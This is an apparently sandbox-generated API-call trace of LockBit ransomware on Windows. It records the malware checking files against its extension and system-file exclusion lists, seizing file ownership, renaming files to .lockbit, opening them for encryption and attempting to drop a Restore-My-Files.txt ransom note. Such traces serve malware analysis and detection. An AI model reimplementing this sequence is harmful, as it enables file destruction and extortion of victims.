Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\") returned="" [0081.937] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml") returned=".xml" [0081.937] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0081.937] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0081.937] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0081.937] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0081.937] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0081.938] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0081.938] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0081.938] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0081.938] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0081.938] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0081.938] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0081.938] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0081.938] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0081.938] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0081.938] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0081.938] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0081.938] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0081.938] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0081.938] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0081.938] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0081.938] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0081.938] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0081.938] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0081.938] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0081.939] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0081.939] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0081.939] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0081.939] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0081.939] wsprintfW (in: param_1=0x344be80, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.lockbit") returned 90 [0081.939] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0081.939] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.lockbit")) returned 0 [0081.939] GetLastError () returned 0x5 [0081.939] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0081.940] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0081.940] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0081.940] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0081.941] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0081.941] NtOpenFile (in: FileHandle=0x344be28, DesiredAccess=0x80, ObjectAttributes=0x344bcd8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344bcd0, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344be28*=0x3b0, IoStatusBlock=0x344bcd0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0081.941] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0081.941] NtQueryInformationFile (in: FileHandle=0x3b0, IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0) returned 0x0 [0081.957] NtClose (Handle=0x3b0) returned 0x0 [0081.957] RtlFreeAnsiString (AnsiString="\\") [0081.957] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344be64 | out: TokenHandle=0x344be64*=0x3b0) returned 1 [0081.957] malloc (_Size=0x200) returned 0x53fcc0 [0081.957] GetTokenInformation (in: TokenHandle=0x3b0, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344be60 | out: TokenInformation=0x53fcc0, ReturnLength=0x344be60) returned 1 [0081.957] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344be48, dwRevision=0x1 | out: pSecurityDescriptor=0x344be48) returned 1 [0081.957] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344be48, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344be48) returned 1 [0081.957] CloseHandle (hObject=0x3b0) returned 1 [0081.957] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344be48) returned 1 [0081.958] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344be48) returned 1 [0081.959] free (_Block=0x53fcc0) [0081.959] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0081.959] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.lockbit")) returned 1 [0081.959] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b0 [0081.959] CreateIoCompletionPort (FileHandle=0x3b0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0081.959] malloc (_Size=0x40068) returned 0x206b860 [0081.960] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=11067) returned 1 [0081.960] ReadFile (in: hFile=0x3b0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0081.962] GetLastError () returned 0x3e5 [0081.962] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main") returned 1 [0081.962] wsprintfW (in: param_1=0x344bc38, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\Restore-My-Files.txt") returned 91 [0081.962] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.962] FindNextFileW (in: hFindFile=0x2e32d0, lpFindFileData=0x344c7a8 | out: lpFindFileData=0x344c7a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e32b6f, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1e32b6f, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f79a7b7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2ac3, dwReserved0=0xfd7a0866, dwReserved1=0x1ca0431, cFileName="zh-phonetic.xml", cAlternateFileName="")) returned 1 [0081.962] lstrcmpiW (lpString1=".", lpString2="zh-phonetic.xml") returned -1 [0081.962] lstrcmpiW (lpString1="..", lpString2="zh-phonetic.xml") returned -1 [0081.962] PathFindExtensionW (pszPath="zh-phonetic.xml") returned=".xml" [0081.962] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0081.962] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0081.962] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0081.962] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0081.962] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0081.962] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0081.962] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0081.962] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0081.963] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0081.963] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0081.963] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0081.963] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0081.963] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0081.963] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0081.963] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0081.963] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0081.963] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0081.963] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0081.963] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0081.963] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0081.963] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0081.963] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0081.963] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0081.963] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0081.963] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0081.963] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0081.963] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0081.963] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0081.963] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0081.963] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0081.963] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0081.963] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0081.963] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0081.963] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0081.963] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0081.963] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0081.964] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0081.964] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0081.964] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0081.964] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0081.964] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0081.964] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0081.964] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0081.964] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0081.964] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0081.964] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0081.964] wsprintfW (in: param_1=0x344c6e0, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0081.964] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="zh-phonetic.xml") returned -1 [0081.964] lstrcmpiW (lpString1="ntldr", lpString2="zh-phonetic.xml") returned -1 [0081.964] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="zh-phonetic.xml") returned -1 [0081.964] lstrcmpiW (lpString1="bootsect.bak", lpString2="zh-phonetic.xml") returned -1 [0081.964] lstrcmpiW (lpString1="autorun.inf", lpString2="zh-phonetic.xml") returned -1 [0081.964] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\") returned="" [0081.964] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml") returned=".xml" [0081.964] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0081.964] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0081.964] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0081.964] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0081.964] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0081.964] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0081.964] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0081.964] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0081.965] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0081.965] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0081.965] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0081.965] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0081.965] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0081.965] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0081.965] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0081.965] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0081.965] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0081.965] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0081.965] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0081.965] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0081.965] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0081.965] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0081.965] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0081.965] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0081.965] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0081.965] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0081.965] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0081.965] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0081.965] wsprintfW (in: param_1=0x344be80, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.lockbit") returned 94 [0081.965] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0081.965] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.lockbit")) returned 0 [0081.970] GetLastError () returned 0x5 [0081.970] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0081.970] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0081.970] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0081.971] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0081.971] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0081.971] NtOpenFile (in: FileHandle=0x344be28, DesiredAccess=0x80, ObjectAttributes=0x344bcd8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344bcd0, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344be28*=0x3c0, IoStatusBlock=0x344bcd0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0081.971] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0081.971] NtQueryInformationFile (in: FileHandle=0x3c0, IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0) returned 0x0 [0081.984] NtClose (Handle=0x3c0) returned 0x0 [0081.985] RtlFreeAnsiString (AnsiString="\\") [0081.985] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344be64 | out: TokenHandle=0x344be64*=0x3c0) returned 1 [0081.985] malloc (_Size=0x200) returned 0x53fcc0 [0081.985] GetTokenInformation (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344be60 | out: TokenInformation=0x53fcc0, ReturnLength=0x344be60) returned 1 [0081.985] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344be48, dwRevision=0x1 | out: pSecurityDescriptor=0x344be48) returned 1 [0081.985] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344be48, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344be48) returned 1 [0081.985] CloseHandle (hObject=0x3c0) returned 1 [0081.985] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344be48) returned 1 [0081.985] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344be48) returned 1 [0081.986] free (_Block=0x53fcc0) [0081.986] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0081.986] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.lockbit")) returned 1 [0081.987] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0081.987] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0081.987] malloc (_Size=0x40068) returned 0x20abae0 [0081.987] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x20abaf8 | out: lpFileSize=0x20abaf8*=10947) returned 1 [0081.987] ReadFile (in: hFile=0x3c0, lpBuffer=0x20abb14, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0) returned 1 [0081.989] GetLastError () returned 0x3e5 [0081.989] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main") returned 1 [0081.989] wsprintfW (in: param_1=0x344bc38, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\Restore-My-Files.txt") returned 91 [0081.989] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.989] FindNextFileW (in: hFindFile=0x2e32d0, lpFindFileData=0x344c7a8 | out: lpFindFileData=0x344c7a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e32b6f, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1e32b6f, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f79a7b7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2ac3, dwReserved0=0xfd7a0866, dwReserved1=0x1ca0431, cFileName="zh-phonetic.xml", cAlternateFileName="")) returned 0 [0081.989] GetLastError () returned 0x12 [0081.989] FindClose (in: hFindFile=0x2e32d0 | out: hFindFile=0x2e32d0) returned 1 [0081.990] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f513079, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f513079, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f513079, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x9655, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="main.xml", cAlternateFileName="")) returned 1 [0081.990] lstrcmpiW (lpString1=".", lpString2="main.xml") returned -1 [0081.990] lstrcmpiW (lpString1="..", lpString2="main.xml") returned -1 [0081.990] PathFindExtensionW (pszPath="main.xml") returned=".xml" [0081.990] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0081.990] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0081.990] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0081.990] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0081.990] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0081.990] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0081.990] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0081.990] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0081.990] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0081.990] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0081.990] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0081.990] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0081.990] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0081.990] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0081.990] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0081.990] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0081.990] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0081.990] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0081.991] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0081.991] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0081.991] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0081.991] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0081.991] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0081.991] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0081.991] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0081.991] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0081.991] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0081.991] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0081.991] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0081.991] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0081.991] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0081.991] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0081.991] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0081.991] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0081.991] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0081.991] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0081.991] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0081.991] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0081.991] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0081.991] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0081.991] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0081.991] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0081.991] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0081.991] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0081.991] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0081.992] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0081.992] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0081.992] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="main.xml") returned 1 [0081.992] lstrcmpiW (lpString1="ntldr", lpString2="main.xml") returned 1 [0081.992] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="main.xml") returned 1 [0081.992] lstrcmpiW (lpString1="bootsect.bak", lpString2="main.xml") returned -1 [0081.992] lstrcmpiW (lpString1="autorun.inf", lpString2="main.xml") returned -1 [0081.992] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\") returned="" [0081.992] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml") returned=".xml" [0081.992] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0081.992] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0081.992] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 